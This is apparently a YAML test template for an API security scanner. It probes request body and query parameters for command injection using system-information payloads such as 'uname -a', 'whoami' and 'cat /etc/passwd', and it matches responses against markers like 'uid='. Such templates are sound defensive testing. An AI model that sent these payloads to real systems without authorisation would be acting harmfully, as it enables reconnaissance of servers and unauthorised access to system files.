---
id: COMMAND_INJECTION_SYSTEM_INFO
info:
  name: "Command Injection - System Information Retrieval"
  description: "Tests whether the application is vulnerable to command injection through system information retrieval commands."
  details: "This test injects system information commands (uname, ifconfig, ps, df, etc.) to check if the application executes them, indicating a command injection vulnerability and information disclosure."
  impact: "Command injection vulnerabilities allow attackers to execute arbitrary commands on the server, potentially leading to complete system compromise, unauthorized data access, and sensitive information disclosure."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: COMMAND_INJECTION_SYSTEM_INFO
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://twitter.com/trbughunters/status/1283133356922884096"
  cwe:
    - CWE-77
    - CWE-78
  cve:
    - CVE-2023-25826
    - CVE-2023-41031

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  response_code:
    gte: 200
    lt: 300
  method:
    neq: "OPTIONS"
  response_payload:
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
  or:
    - request_payload:
        for_one:
          key:
            regex: .*
            extractMultiple: bodyKeys
          value:
            extract: bodyValue
    - query_param:
        for_one:
          key:
            regex: .*
            extractMultiple: queryKeys
          value:
            regex: .*
            extract: queryValue

wordLists:
  # System information retrieval payloads
  sysInfoPayloads:
    - "uname -a"
    - "ifconfig"
    - "ip addr"
    - "ps aux"
    - "df -h"
    - "free -m"
    - "whoami"
    - "id"
    - "hostname"
    - "uptime"
    - "cat /etc/passwd"
    - "cat /etc/os-release"
  
  # Command execution outcomes
  commandOutcomes:
    - "uid="
    - "gid="
    - "groups="
    - "Linux"
    - "Kernel"
    - "root"
    - "en0: flags="
    - "<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST>"
    - "prefixlen"
    - "filesystem"
    - "capacity"
    - "buff/cache"

execute:
  type: single
  requests:
    - req:
        - modify_body_param:
            ${bodyKeys}: "${sysInfoPayloads}"
        - modify_query_param:
            ${queryKeys}: "${sysInfoPayloads}"

validate:
  response_payload:
    length:
      gt: 0
    contains_either: "${commandOutcomes}"
    not_contains:
      - Error
      - Internal Server
      - <html>
      - </html>
